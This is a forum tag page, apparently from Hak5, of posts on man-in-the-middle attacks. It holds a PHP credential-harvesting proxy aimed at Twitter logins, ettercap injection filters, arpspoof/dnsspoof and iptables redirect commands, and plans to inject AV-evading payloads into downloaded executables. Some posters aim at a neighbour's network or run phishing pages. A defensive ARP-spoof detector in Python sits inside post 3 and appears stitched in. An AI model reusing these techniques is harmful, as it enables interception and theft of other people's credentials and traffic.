Showing results for tags 'MITM'.
  1. Hi, I am a complete noob to everything ever so just please bear with me. I want to buy myself a basic laptop which will allow me to begin learning to hack - I have a strong knowledge of computers and want to learn Internet security and pentesting properly. I have a £450-£500 budget and I maybe can push it if needed. I want to be running Kali Linux on it and I will be partitioning a drive to get to that. I was hoping for a 15.6" screen, i5, 8gb RAM and a 1TB HDD with as much battery life as possible. I have seen normal laptops with this for £400 so I think I can get this. My real question is if there are any things I will NEED to get me started; for example I know certain wireless cards make pentesting much easier but I don't know which models or which laptops contain them (I was hoping not to buy an external one). I guess if need be I can change a wireless card but I would like to stay away from fiddling with internals. Any suggestions/help would be greatly appreciated. Thanks, MrJaMilne
  2. What is the best way to protect myself against MITM attacks on a public network?
  3. Hi, I don't post a lot on these forums but I made a cool script that protects a Linux box from gateway ARP poisoning attacks (it does it instantly, without a 5 second poll delay like other scripts). All details are on the GitHub repo: https://github.com/Prodicode/ARPPD All feedback is appreciated! This was my first security project in C.
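The event-driven approach the post above describes, as an added example that is not the ARPPD code: each raw Ethernet/ARP frame is parsed as it arrives and an alert is raised the moment an ARP reply claims the gateway IP with a MAC other than the one pinned or first learned, with no cache polling interval. The frames, MAC addresses and the 192.168.0.1 gateway are constructed sample data.

```python
import struct
from typing import Optional

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2


def parse_arp(frame: bytes) -> Optional[dict]:
    """Return the fields of an IPv4 ARP packet in an Ethernet II frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    # ARP header: htype, ptype, hlen, plen, opcode, then sha, spa, tha, tpa
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": ":".join(f"{b:02x}" for b in frame[22:28]),
        "sender_ip": ".".join(str(b) for b in frame[28:32]),
        "target_ip": ".".join(str(b) for b in frame[38:42]),
    }


class GatewayArpGuard:
    """Pins the gateway IP to one MAC and flags any ARP reply that contradicts it.
    Frames are checked on arrival, so poisoning is caught on the first spoofed reply."""

    def __init__(self, gateway_ip: str, gateway_mac: Optional[str] = None):
        self.gateway_ip = gateway_ip
        self.gateway_mac = gateway_mac  # None: learn from the first reply seen
        self.alerts = []

    def feed(self, frame: bytes) -> Optional[str]:
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY or arp["sender_ip"] != self.gateway_ip:
            return None
        if self.gateway_mac is None:
            self.gateway_mac = arp["sender_mac"]
            return None
        if arp["sender_mac"] != self.gateway_mac:
            alert = (f"ARP reply claims gateway {self.gateway_ip} is at "
                     f"{arp['sender_mac']}, expected {self.gateway_mac}")
            self.alerts.append(alert)
            return alert
        return None


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Build a sample Ethernet/ARP reply (constructed test data, not a capture)."""
    smac = bytes.fromhex(sender_mac.replace(":", ""))
    tmac = bytes.fromhex(target_mac.replace(":", ""))
    sip = bytes(int(x) for x in sender_ip.split("."))
    tip = bytes(int(x) for x in target_ip.split("."))
    eth = tmac + smac + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY) + smac + sip + tmac + tip
    return eth + arp


def demo() -> list:
    """Genuine gateway reply, then a spoofed one from another MAC: one alert."""
    guard = GatewayArpGuard("192.168.0.1")
    host = "aa:bb:cc:00:00:05"  # constructed sample addresses throughout
    guard.feed(build_arp_reply("aa:bb:cc:00:00:01", "192.168.0.1", host, "192.168.0.5"))
    guard.feed(build_arp_reply("de:ad:be:ef:00:99", "192.168.0.1", host, "192.168.0.5"))
    return guard.alerts
```

On a real host the frames would come from a raw AF_PACKET socket filtered to ethertype 0x0806, and the pinned gateway MAC should be supplied from a trusted source rather than learned, since the first reply seen could itself be spoofed.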
  4. Hey guys, I've run into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's PHP if there is a path specified in the URL that isn't "index.php". Example landing page code below; var_dump($_POST) on line 12 returns an empty array despite the form sending the data:

    <?php
    if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) {
        /* If not visiting twitter, redirect to non-HSTS twitter domain */
        die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">');
    } else {
        /* form posts to http://twitter.co.uk/sessions */
        if(strstr($_SERVER['REQUEST_URI'], "/sessions")) {
            /* var_dump($_POST) returns an empty array, should print login data */
            var_dump($_POST);
            die();
        }
        /* Curl the site */
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($curl);
        $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */
        $result = str_replace('<script', "<div style='display:none'><!--", $result);
        $result = str_replace('</script', "--></div", $result);
        echo $result;
    }
    ?>

    If I make the form post to http://twitter.co.uk directly, without the /sessions, they are accessible from the landing page, but I would really like to be able to access them even with other file paths.
  5. Hi everyone, I use the WiFi Pineapple as a man in the middle device redirecting all traffic to a laptop that the WiFi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup: MacBook running a Linux VM (VirtualBox), connected via USB to the WiFi Pineapple, which is sending all traffic to the VirtualBox machine. Pardon my diagram skills :( Here is the script I have created based off of the post above. However, I don't think this is ideal since you would need to SSH into the Pineapple to run this script every time. Ideally it would be best to do this via the web interface of the Pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated.

    #!/bin/bash
    if [[ $# -eq 0 ]] ; then
        echo "Usage: $0 (enable|disable)"
        exit 1
    fi
    action="$1"
    case $action in
        enable)
            echo "Enabling ..."
            iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
            #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
            iptables -t nat -A POSTROUTING -j MASQUERADE
            ;;
        disable)
            echo "Disabling ..."
            iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
            #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
            ;;
        *)
            echo "Usage: $0 (enable|disable)"
            exit 1
            ;;
    esac
  6. Hello, I hope my video will help you understand how hackers can perform a man in the middle attack and one of the tools they can use. Look what they can do with Xerosploit.
  7. KST

    SSH MITM

    Hi, I tested the SSH MITM by way of this link. I have three PCs: attacker PC, SSH server and SSH client. After all instructions were done, I connected by SSH to the server from the client. But when I do this, I cannot log in with a user from the server. I can only log in with the attacker's username and password and get logged in to the attacker PC. It means that the attacker PC does not redirect to the SSH server. But I have completed all instructions described in that link. If you have time, please check my question and answer me.
  8. After using MITMf for a while on my Kali Linux machine, I'm wondering whether it would be feasible to use it on a Bash Bunny. You'd have to be able to pull things like the gateway and DNS server automatically, but beyond that the only problem I can think of is the complex dependencies for MITMf. Thoughts?
  9. I'm trying to perform a JavaScript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are from before 2016, so I am not sure if this kind of attack still works now. Anyway, this is my filter script:

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
            msg("zapped Accept-Encoding!\n");
        }
    }
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "<head>")) {
            replace("<head>", "<HEAD>");
            msg("Code injected");
        }
    }

    And I run it as

    ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

    test.ef is the compiled filter file. When the victim opens any web page, I get a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the HTML source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part,

    if (ip.proto == TCP && tcp.dst == 80) {
        replace("<head>", "<HEAD>");
        msg("Code injected");
    }

    the "Code injected" message shows, but the HTML code on the web client is not changed, which means the problem is that the filter cannot find any named strings (in this case <head>) in the HTML file; it can only deal with the header (Accept-Encoding). Does anyone know a solution or workaround? Please, any suggestions will be appreciated, thanks.
  10. Hello Hak5 members, new to this site and platform, but am pretty excited to be back in the States and to get my hands on the Tetra I purchased. When looking at modules I can't seem to find something similar to the MITMf framework integrated into it. This makes use of filepwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting:

    1. Client makes request for .exe file
    2. Pineapple forwards to the web server
    3. Web server responds
    4. Pineapple receives the traffic:
       If (PARAMS == TRUE): Pass the executable over to Shellter, inject a payload, then forward to the client.
       else: forward to the client

    Some of the params you would set up would be maximum file size (to make sure the process doesn't take too long), if the program is already wrapped, etc. Ideally, one would be running some sort of HTTPS downgrade attack, or SSL Stripper, so the probability of injection is higher as most sites now use HTTPS. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow users to pipe the executable to whatever program they want to handle the payload injection and just have the module looking for the created file to pop up in a specific location.
  11. Hey all, the Tetra allows us to do so many great things. We can spoof the SSID and make a client think they are connecting to a "known" AP. The client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the client sends? I have a feeling the issue has to do with hashing done on each side of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyone's input and teaching me like I'm 5. If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with WiFi?
  12. Hi guys! I recently wanted to get interested in deploying a MITM attack in my home network. I first used SSLSplit and ettercap from the Pineapple web interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //) but I didn't manage to get SSLStrip working... And if I try to run SSLStrip from the GUI, the certs are signed by "SSLStrip", which causes security warnings. Is there a way to generate custom certs and pass them to the SSLStrip GUI? Thanks! PS: I observed that when the attack is going on, it's really slow to browse the internet... Is it normal? Sorry for my bad English.
  13. Hello, I have one question about the LAN Turtle. When I connect the LAN Turtle to a PC in a "big" network, the LAN Turtle has access to the network, doesn't it? When I want to start a MITM attack, does the target device only have to be in the same network, or should I connect the LAN Turtle directly to the targeted device? So for example, I plug the LAN Turtle into "PC206" and I want to attack "PC259"; does it work, or should I plug the Turtle into PC259? I hope you understand my question :) Thanks in advance, Simon PS: sorry for my bad English, I'm not a native speaker.
  14. Hello, I was wondering what are the different techniques you guys use for a man in the middle attack. Just for something to learn and advance on. Thanks.
  15. Are there any possible ways of doing MITM attacks that would take usernames and passwords? When I try to use Xerosploit, PytheM, or even bettercap, none of these methods work on websites such as Facebook, Twitter, PayPal, Gmail, etc. Are there any new methods that are working right now?
  16. Hi, I did a pentest in a LAN, and some weird things happened. This LAN is a little unusual: there are two routers, say A and B. A is directly connected to an optical fiber, doing PPPoE to the WAN, and has a gateway of 192.168.1.1. B is connected to A, a wireless router, with a gateway of 192.168.0.1. All the clients and my Kali machine are connected to B. Target has an IP of 192.168.0.104. Here is what I did with Kali. I used the following to ARP spoof the target and router B:

    arpspoof -i eth0 -t 192.168.0.1 192.168.0.104
    arpspoof -i eth0 -t 192.168.0.104 192.168.0.1
    sysctl -w net.ipv4.ip_forward=1

    Then I did a DNS spoof with

    dnsspoof -i eth0 -f dnshost.spoof

    It did not work; all the traffic went through my Kali, but the target was still able to access the original webpage. And here comes the weird thing. I stopped the dnsspoof, stopped the IP forwarding with

    sysctl -w net.ipv4.ip_forward=0

    and I started exactly the same dnsspoof as last time again, and it worked! This really confused me, because after that, I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all, I left it at the default 0, and it did not work, because the ARP traffic was not working (which is expected!!). arpspoof and dnsspoof both work ONLY IF the process "IP forwarding is first enabled and then disabled" completed once, before launching dnsspoof. IP forwarding only on gives dnsspoof not working; IP forwarding only always off gives arpspoof not working. Besides that, two more strange things I failed to understand. 1. Sometimes, the "IP forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure. 2. Here is the log/feedback of a dnsspoof:

    root@kali:~# dnsspoof -i eth0 -f dnshost.spoof
    dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
    192.168.0.104.62290 > 192.168.1.1.53: 4678+ A? www.youtube.com
    192.168.0.104.62290 > 192.168.0.1.53: 4678+ A? www.youtube.com
    192.168.0.104.65063 > 192.168.1.1.53: 31827+ A? www.youtube.com
    192.168.0.104.65063 > 192.168.0.1.53: 31827+ A? www.youtube.com
    192.168.0.104.55426 > 192.168.1.1.53: 51608+ A? www.sina.com
    192.168.0.104.55426 > 192.168.0.1.53: 51608+ A? www.sina.com
    192.168.0.104.54794 > 192.168.1.1.53: 5651+ A? www.sina.com
    192.168.0.104.54794 > 192.168.0.1.53: 5651+ A? www.sina.com
    192.168.0.104.60485 > 192.168.1.1.53: 2950+ A? www.sina.com
    192.168.0.104.63394 > 192.168.1.1.53: 41196+ A? www.facebook.com
    192.168.0.104.63394 > 192.168.0.1.53: 41196+ A? www.facebook.com
    192.168.0.104.52953 > 192.168.1.1.53: 6912+ A? www.facebook.com
    192.168.0.104.52953 > 192.168.0.1.53: 6912+ A? www.facebook.com
    ^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof
    dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
    192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com
    192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com
    192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com
    192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com

    The second launch was a failed one; the first one succeeded. The router I am targeting should be 192.168.0.1, as router B; in the second launch, it is interacting with only router A (192.168.1.1). I am not sure what that means and if it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch worked sometimes. I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks
  17. Hey guys, I'm partially new here, just wanted a little bit of help with a MiTM attack. Suppose I successfully cracked my neighbour's WiFi using the Evil Twin method and now I want to Man In The Middle his smartphone or his whole network; is it possible? My question here is that most of us nowadays use smartphones to use Facebook, e-mails etc. and not just go to a browser and then facebook.com, right? So is that possible? Thanks! :confused:
  18. I am completely and utterly disappointed. I have been searching for weeks to find out how to perform an ARP-poisoning MITM attack to sniff plain text credentials; the best thing I could find was Responder. There is no guide on how to use this explicitly on the WiFi Pineapple. I have basically paid $250 for a box. The last person to ask about this did not get anywhere in terms of help either. Please, can somebody in this entire forum show me how I can configure Responder to work on a wireless network, like from the ground level. What options do I select, do I connect in client mode (wlan1, wlan0) etc.? Please, this was a big investment for me.
  19. Hello wonderful people, so I'm hitting a snag with an attack I'm trying to carry out and could really use anyone's help trying to troubleshoot this. I've got the theory down and get halfway but can't seem to jump the last hurdle. So here's the gist: I'm trying to MitM devices connecting to my TETRA using Burp Suite to capture any HTTP or HTTPS traffic so that I can observe/modify (you know the drill) the HTTP/S traffic. Thing is, I can capture the traffic and MitM successfully with the TETRA (I am able to see all traffic passing through my attack machine within Wireshark). However, I can't seem to get that traffic into Burp. I'm only interested in sending HTTP/S traffic to Burp; all other traffic can head on out to the Internet. I've tried using iptables rules to preroute the traffic bound for dport 80 or 443 to the Burp proxy listening on 8080 (and tried individual listeners on 80 and 443 to no avail), but no traffic seems to get to it... well, to an extent. If I grab the HTTP header of google.com whilst routing traffic to Burp, I can grab an HTTP header for Burp itself. Here's a diagram because I like making them: Attacker's IP (eth1) is 172.16.42.42. eth0 IP is 192.168.0.10 (LAN has Internet connectivity via gateway at 192.168.32.1). eth0 and eth1 are wired (I wire into the ETH port of my TETRA). Mobile devices are connecting via WiFi (PineAP). It's simple enough in my head: have all traffic coming in over eth1 that is destined for 80 or 443 re-route to the Burp listener... but it doesn't seem to work correctly.

    Here are the iptables rules I was creating to try and route the traffic (applied on the attacker's machine):

    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 127.0.0.1:8080
    iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to 127.0.0.1:8080

    And IP forwarding is enabled on the attacker's machine with:

    sysctl net.ipv4.ip_forward=1

    I'm still trying out stuff; the next thing is to route HTTP/S traffic from eth1 to lo (seeing as the listener is on lo 127.0.0.1:8080), but I know from previous posts there are legends on these forums and would appreciate some pokes in the right direction if anyone has any ideas. And yes, I did look around the forums and on the Internet, but I can't seem to find the thing that works. Any thoughts are welcome. Think this might be a cool addition to the forums if we can get it going. Thanks.
  20. Hey everyone, I am wondering if you guys have any specific steps you take once you are the MITM? What kind of things are you trying to do with the packets? Push Java applets to clients? Use Karmetasploit? Since SSLStrip is no longer working, what types of things are you doing to guarantee the most data out of your "victims"? I am particularly interested in emails, social media, etc... Assuming it's been approved by the client I am auditing. I really want to show some examples of what can go wrong for a client site when a MITM attack is successfully executed using the Pineapple; any ideas?
  21. Can we bypass HSTS by using this MITM technique? The attack works on the latest versions of iOS, including iOS 8.1.1, and on most Android devices. Source: https://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex-icmp-redirect-attacks-in-the-wild/
  22. Here's something I've been thinking about for a long time: you know when you go into a bar, ask for the wifi password and notice that the router has the default user and pass set? How easy if at all possible would it be to somehow sniff that traffic from somewhere else? Maybe it's even possible to automate things like capturing certain types of packages, cookies or even capture some credentials? Maybe I'm way off, I'm a complete rookie in this field. In that case I'd be very grateful if somebody explained why it can't be done! Thanks in advance!
  23. Hi, I have made some fake pages for known pages like Facebook etc. I have also installed dnsmasq in Kali and set up an Apache server, and everything is okay. Now when the victim visits Facebook in Chrome, for example, it will tell him that this is unsecured because of HTTPS. Is there any way or tools in Kali to avoid that? Or any other thing would be great, thanks :)
  24. I remember an older episode of Hak5 when Darren was showing some fun with a MITM. He actually had an application that was reconstructing the packets as they flowed through his laptop and reconstructed the webpage that the user was surfing. Anyone remember that episode? And for icing on the cake he did some text manipulation (like flipping the text upside down, or changing certain words, etc.) so the user was seeing a 'modified' version of the web page.
  25. A while back Em3rgency from Top-Hat-Sec created a script that worked in BackTrack. I recently modified it to work in Kali. Check it out for your Fake AP pleasure. Check out my blog for the script at http://wp.me/p479Vp-1p instead of http://goo.gl/UFYMg3. Let me know if you run into any problems running it.